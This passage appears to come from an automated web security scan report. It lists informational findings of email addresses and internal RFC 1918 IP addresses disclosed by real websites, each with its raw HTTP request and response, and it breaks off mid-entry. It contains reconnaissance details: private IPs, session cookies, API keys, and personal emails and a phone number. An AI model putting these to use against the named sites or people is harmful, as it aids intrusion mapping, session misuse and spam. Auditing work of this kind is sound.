Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:28:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Interface Test
...[SNIP]...
<a href="mailto:info@sophelle.com" class="footer">info@sophelle.com</a>
...[SNIP]...

22.111. http://www.tenzing.com/atg-ecommerce-hosting.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/atg-ecommerce-hosting.asp

Issue detail

The following email address was disclosed in the response:

sales@tenzing.com

Request

Response

22.112. http://www.tenzing.com/cloud/cloud-pricing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/cloud/cloud-pricing.asp

Issue detail

The following email address was disclosed in the response:

sales@tenzing.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 37219
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.113. http://www.tenzing.com/cloud/sign-up-now.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/cloud/sign-up-now.asp

Issue detail

The following email address was disclosed in the response:

sales@tenzing.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 34304
Content-Type: text/html
Set-Cookie: casestudiesID=1; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.114. http://www.tenzing.com/css/basic_stylesheet_v1.1.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/css/basic_stylesheet_v1.1.css

Issue detail

The following email address was disclosed in the response:

scott.beardmore@tenzing.com

Request

GET /css/basic_stylesheet_v1.1.css HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 46937
Content-Type: text/css
Last-Modified: Wed, 31 Aug 2011 14:14:36 GMT
Accept-Ranges: bytes
ETag: "a3832850e867cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:06 GMT

/*
Basic Style Sheet for Secondary Pages
version: 1.1
developers: Scott Beardmore (Tenzing.com) / Ulf Lonegren (Saelstrom.com)
email: scott.beardmore@tenzing.com
website: http://www.tenzing.com
/* ------------------------------------------------------------------------------------------------ Base Structure ---------------------------------- */

/* ------
...[SNIP]...

22.115. http://www.tenzing.com/css/navigation_stylesheet_v1.1.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/css/navigation_stylesheet_v1.1.css

Issue detail

The following email address was disclosed in the response:

scott.beardmore@tenzing.com

Request

GET /css/navigation_stylesheet_v1.1.css HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 14891
Content-Type: text/css
Last-Modified: Wed, 31 Aug 2011 14:14:36 GMT
Accept-Ranges: bytes
ETag: "a3832850e867cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:06 GMT

/*
Navigation Style Sheet for Secondary Pages
version: 1.1
developers: Scott Beardmore (Tenzing.com) / Ulf Lonegren (Saelstrom.com)
email: scott.beardmore@tenzing.com
website: http://www.tenzing.com
/* ----------------------------------------------------------------- LINK STYLES ---------------------------------- */

/* ------ Hyperlinks ------ */
a.bodylinks
...[SNIP]...

22.116. http://www.tenzing.com/hosting-solutions.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/hosting-solutions.asp

Issue detail

The following email address was disclosed in the response:

sales@tenzing.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 19991
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.117. http://www.tenzing.com/js/jquery/jquery.accordion.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/js/jquery/jquery.accordion.js

Issue detail

The following email address was disclosed in the response:

ryan@gozipline.com

Request

GET /js/jquery/jquery.accordion.js HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 1882
Content-Type: application/x-javascript
Last-Modified: Thu, 09 Sep 2010 13:29:43 GMT
Accept-Ranges: bytes
ETag: "86ed1f102350cb1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:07 GMT

/***********************************************************************************************************************
DOCUMENT: includes/javascript.js
DEVELOPED BY: Ryan Stemkoski
COMPANY: Zipline Interactive
EMAIL: ryan@gozipline.com
PHONE: 509-321-2849
DATE: 3/26/2009
UPDATED: 3/25/2010
DESCRIPTION: This is the JavaScript required to create the accordion style menu. Requires jQuery library
NOTE: Because of a bug in jQuery with I
...[SNIP]...

22.118. http://www.tenzing.com/sitemap.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/sitemap.asp

Issue detail

The following email address was disclosed in the response:

sales@tenzing.com

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 21684
Content-Type: text/html
Set-Cookie: casestudiesID=4; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="mailto:sales@tenzing.com">sales@tenzing.com</a>
...[SNIP]...

22.119. http://www.tenzing.com/validation.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/validation.js

Issue detail

The following email addresses were disclosed in the response:

abc@host.uk
john.doe@somewhere.com
stamhankar@hotmail.com
tboland@gmail.com

Request

GET /validation.js HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 17602
Content-Type: application/x-javascript
Last-Modified: Wed, 01 Jun 2011 10:49:25 GMT
Accept-Ranges: bytes
ETag: "fea889924920cc1:17bb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:09 GMT

/*

Generic Form Validation.
tboland@gmail.com
http://www.techtoolblog.com
License: Free To Use, If Modified/Added
please send updated source to tboland@gmail.com

To Validate a Form Element Add the Custom Attribute:
validate="VALIDATEHOW"

Your Current Options Are:
"not_empty"
"integer"
"number" - decimal allowed
"email"
"phone" - includes internati
...[SNIP]...
}
}
}

return blnResult;
}

/*
This script and many more are available free online at
The JavaScript Source!! http://javascript.internet.com

V1.1.3: Sandeep V. Tamhankar (stamhankar@hotmail.com)
Original: Sandeep V. Tamhankar (stamhankar@hotmail.com)
Changes:
1.1.4: Fixed a bug where upper ASCII characters (i.e. accented letters
international characters) were allowed.

1.1.3: Added the restriction to only accept addresses ending in two
lett
...[SNIP]...
s was passing
(the bug is actually in the weak regexp engine of the browser; I
simplified the regexps to make it work).

1.1.1: Removed restriction that countries must be preceded by a domain,
so abc@host.uk is now legal. However, there's still the
restriction that an address must end in a two or three letter
word.

1.1: Rewrote most of the function to conform more closely to RFC 822.

1.0: Origin
...[SNIP]...
wing string represents an atom (basically a series of non-special characters.) */

var atom=validChars + '+';

/* The following string represents one word in the typical username.
For example, in john.doe@somewhere.com, john and doe are words.
Basically, a word is either an atom or quoted string. */

var word="(" + atom + "|" + quotedUser + ")";

// The following pattern describes the structure of the user

v
...[SNIP]...

23. Private IP addresses disclosed previous next
There are 30 instances of this issue:

http://blog.ulf-wendel.de/
http://code.openark.org/blog/
http://developers.facebook.com/plugins/
http://digg.com/submit
http://search.oracle.com/search/js/resources/TranslationElements_en11_1_1_0_0.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/extern/login_status.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.fekkai.com/
http://www.google.com/sdch/StnTz5pY.dct
http://www.oracle.com/technetwork/community/developer-vm/index.html
http://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
http://www.oracle.com/technetwork/database/windows/downloads/index-101290.html
http://www.oracle.com/technetwork/developer-tools/apex/downloads/index.html
http://www.oracle.com/technetwork/developer-tools/jdev/downloads/index.html
http://www.oracle.com/technetwork/middleware/soasuite/downloads/index.html
http://www.oracle.com/technetwork/oem/grid-control/downloads/index.html

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

23.1. http://blog.ulf-wendel.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.ulf-wendel.de
Path:	/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

192.168.2.12
192.168.2.27

Request

GET / HTTP/1.1
Host: blog.ulf-wendel.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:18 GMT
Server: Apache
X-Pingback: http://blog.ulf-wendel.de/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 146024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...
<pre>
[myapp]
master[]=localhost:/tmp/mysql.sock
slave[]=192.168.2.27:3306
pick[]=random_once
</pre>
...[SNIP]...
<pre>
[myapp]
master[]=localhost:/tmp/mysql.sock
slave[]=192.168.2.27:3306
</pre>
...[SNIP]...
<pre>
[myapp]
master[]=localhost:/tmp/mysql.sock
slave[]=192.168.2.27:3306
trx_stickiness=master
</pre>
...[SNIP]...
rom the configuration file "mysqlnd_ms_repl_setup.ini" could also read " [" host_or_ip_used_so_far]" Let’s assume that your forum had been configured to connect to "192.168.2.12" before you started with replication. Try this config…<br />
...[SNIP]...
<pre>
[192.168.2.12]
master[] = master.mynetwork
slave[] = slave_1.mynetwork
slave[] = slave_2.mynetwork
</pre>
...[SNIP]...

23.2. http://code.openark.org/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://code.openark.org
Path:	/blog/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.0.0.3

Request

GET /blog/ HTTP/1.1
Host: code.openark.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://code.openark.org/blog/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<strong>'10.0.0.3'</strong>
...[SNIP]...
<strong>'temp'@'10.0.0.3'</strong>
...[SNIP]...

23.3. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.195.105

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.4. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.2.130.26

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
<span title="10.2.130.26 Build: 264 - Fri Sep 2 18:08:38 PDT 2011 13.57ms">
...[SNIP]...

23.5. http://search.oracle.com/search/js/resources/TranslationElements_en11_1_1_0_0.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.oracle.com
Path:	/search/js/resources/TranslationElements_en11_1_1_0_0.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.1.8.2

Request

GET /search/js/resources/TranslationElements_en11_1_1_0_0.js HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=94577a1c1e6c366bc46e69bb4867b280b00dd079463a; ses.qapp.sg_tab_name=Oracle+OpenWorld; s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D; BIGipServerses_ext_prod_pool=477779860.30494.0000

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 16 Apr 2011 22:25:19 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (H;max-age=150+0;age=54;ecid=231317025266,0)
Content-Length: 11225
Accept-Ranges: bytes
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:23 GMT
Connection: close

/* $Header: search/sample_src/query/js/resources/TranslationElements_en.js st_search_leiwang_bug-9859003/2 2010/06/30 11:08:22 leiwang Exp $ */
/* Copyright (c) 2007, 2010, Oracle and/or its affiliate
...[SNIP]...
xlf
mture 01/25/08 - 6374161: add 'Hide Similar Documents'
mture 09/06/07 - 6377959: 'No cluster information available...'
mture 08/30/07 - additional messages for end of 10.1.8.2 development
mture 08/08/07 - add 'From x to y' message
mture 07/11/07 - fix 'Within the last' messages
mture 07/05/07 - add message for 'Unknown' and 'None'
mture
...[SNIP]...

23.6. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.connect.facebook.com
Path:	/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.177.120

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "dbfe7810d51b43160242bf8796785f1d"
X-FB-Server: 10.27.177.120
X-Cnection: close
Content-Length: 18454
Cache-Control: public, max-age=816
Expires: Tue, 06 Sep 2011 15:11:09 GMT
Date: Tue, 06 Sep 2011 14:57:33 GMT
Connection: close
Vary: Accept-Encoding

/*1315233047,169587064,JIT Construction: v434551,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

23.7. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.80.47

Request

GET /extern/login_status.php?api_key=17582a7e8baf4c60a804e1226949063d&extern=0&channel=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15837856%2Fsite%2F14081545%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.80.47
X-Cnection: close
Date: Tue, 06 Sep 2011 14:57:59 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

23.8. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.255.53

Request

Response

23.9. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.42.47

Request

GET /extern/login_status.php?api_key=a95b455141f1c76d40987560fb514c1a&app_id=a95b455141f1c76d40987560fb514c1a&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d5a6e14%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21922ca3%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3209f06ac%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df84581864%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18bb9d1e4%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfb1ef197&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.42.47
X-Cnection: close
Date: Tue, 06 Sep 2011 15:32:56 GMT
Content-Length: 248

<script type="text/javascript">
parent.postMessage("cb=f84581864&origin=http\u00253A\u00252F\u00252Fwww.readwriteweb.com\u00252Ff27c152a9&relation=parent&transport=postmessage&frame=fb1ef197", "http:\
...[SNIP]...

23.10. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.119.27

Request

Response

23.11. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.215.54

Request

Response

23.12. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.215.32

Request

GET /plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx&send=false&layout=button_count&width=140&show_faces=true&action=recommend&colorscheme=light&font=arial&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.dove.us/Products/Hair/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

23.13. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

